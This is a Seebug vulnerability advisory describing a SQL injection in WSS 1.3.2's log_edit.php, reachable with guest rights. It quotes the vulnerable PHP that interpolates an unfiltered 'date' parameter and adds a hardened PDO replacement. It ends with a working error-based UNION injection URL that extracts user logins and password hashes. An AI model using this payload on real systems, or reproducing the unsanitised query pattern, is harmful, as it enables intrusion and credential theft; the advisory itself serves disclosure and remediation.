SQL injection in the latest WSS version allows direct data retrieval (part 4)

2014-11-24T00:00:00
ID SSV:95821
Type seebug
Reporter Root
Modified 2014-11-24T00:00:00

Description

Brief description:

Multiple SQL injections in the latest WSS version allow direct data retrieval (part 4); a guest account is enough to inject and pull data.

Details:

The latest official WSS release, 1.3.2, has a SQL injection at one location that returns data directly; guest privileges are sufficient to inject and retrieve data. First, an overview of the WSS user roles:

Administrator: MM_rank=5; Project manager: MM_rank=4; Normal user: MM_rank=3; Guest: MM_rank=2; Read-only: MM_rank=1

In WSS, some files and functions check the MM_rank value (that is, they enforce permissions), while others have no permission check or restriction at all; the two previous vulnerabilities were both in code with no permission restriction. The vulnerability discussed here is reachable by any user with MM_rank greater than or equal to 2, which includes guests. The affected file is log_edit.php:

<?php require_once('config/tank_config.php'); ?>
<?php require_once('session.php'); ?>
<?php
$restrictGoTo = "user_error3.php";
// Only the rank is checked: any user with MM_rank >= 2 (guest and above) passes.
if ($_SESSION['MM_rank'] < "2") {
    header("Location: ". $restrictGoTo);
    exit;
}
$logdate = $_GET['date'];   // taken from the request without any filtering
$taskid = $_GET['taskid'];
$nowuser = $_SESSION['MM_uid'];
$self_url = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$self = substr($self_url, strrpos($self_url, '/') + 1);
$host_url = str_replace($self, '', $self_url);
......
mysql_select_db($database_tankdb, $tankdb);
// $taskid goes through GetSQLValueString(), but $logdate is interpolated raw and unquoted.
$query_log = sprintf("SELECT *, tk_user1.uid as uid1, tk_user2.tk_display_name as tk_display_name2 FROM tk_task_byday inner join tk_task on tk_task_byday.csa_tb_backup1=tk_task.TID inner join tk_user as tk_user2 on tk_task_byday.csa_tb_backup2=tk_user2.uid inner join tk_user as tk_user1 on tk_task.csa_from_user=tk_user1.uid WHERE csa_tb_year=$logdate AND csa_tb_backup1= %s ", GetSQLValueString($taskid, "text"));
$log = mysql_query($query_log, $tankdb) or die(mysql_error());
$row_log = mysql_fetch_assoc($log);
$totalRows_log = mysql_num_rows($log);

Note that $logdate = $_GET['date'] is taken without any filtering. When it is then placed into $query_log, the SQL statement that will be executed, it is neither processed by GetSQLValueString() nor protected by single quotes; it is concatenated straight into the SQL text, which leads to SQL injection.
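The following is an added example of how the query-building part of log_edit.php could be hardened; it is not WSS code. It validates the `date` parameter as a strict integer before it reaches the query and binds both parameters through a PDO prepared statement instead of string interpolation. The PDO handle and the $dsn, $username and $password variables are assumptions (the original uses the mysql_* extension); the table and column names are the ones from the advisory.

```php
<?php
// Added example, not part of WSS: hardened replacement for the query-building
// section of log_edit.php. Assumes $dsn/$username/$password are provided by
// config/tank_config.php (assumption) and that the schema matches the advisory.

require_once('config/tank_config.php');
require_once('session.php');

$restrictGoTo = "user_error3.php";
if (!isset($_SESSION['MM_rank']) || (int)$_SESSION['MM_rank'] < 2) {
    header("Location: " . $restrictGoTo);
    exit;
}

// Accept only a string of ASCII digits of sane length; anything else (the
// original accepted "1 and 1=2 union ...") is rejected before SQL is built.
function validate_int_param(?string $value, int $maxDigits = 10): ?int
{
    if ($value === null || $value === '' || !ctype_digit($value)) {
        return null;
    }
    if (strlen($value) > $maxDigits) {
        return null;
    }
    return (int)$value;
}

$logdate = validate_int_param($_GET['date'] ?? null);
if ($logdate === null) {
    http_response_code(400);
    exit('invalid date parameter');
}
$taskid = $_GET['taskid'] ?? '';

// Assumed PDO connection to the same tankdb database.
$pdo = new PDO($dsn, $username, $password, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares: data never becomes SQL text
]);

$sql = "SELECT *, tk_user1.uid AS uid1, tk_user2.tk_display_name AS tk_display_name2
        FROM tk_task_byday
        INNER JOIN tk_task ON tk_task_byday.csa_tb_backup1 = tk_task.TID
        INNER JOIN tk_user AS tk_user2 ON tk_task_byday.csa_tb_backup2 = tk_user2.uid
        INNER JOIN tk_user AS tk_user1 ON tk_task.csa_from_user = tk_user1.uid
        WHERE csa_tb_year = :year AND csa_tb_backup1 = :taskid";

$stmt = $pdo->prepare($sql);
$stmt->bindValue(':year', $logdate, PDO::PARAM_INT);   // validated integer
$stmt->bindValue(':taskid', $taskid, PDO::PARAM_STR);  // bound, never interpolated
$stmt->execute();

$row_log       = $stmt->fetch(PDO::FETCH_ASSOC);
$totalRows_log = $stmt->rowCount();
```

Binding alone would already close the injection; the digit check on `date` is kept in addition so that a malformed value is rejected with a 400 rather than silently coerced, which also makes tampering attempts visible in the web server's error responses.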

Proof of vulnerability:

http://localhost/wss/log_edit.php?date=1%20and%201=2%20union%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&taskid=1

Injection result (screenshot):

[Image: 1.png, https://images.seebug.org/upload/201411/212221417a07c840e9e7e2b842c6e467b69934f1.png]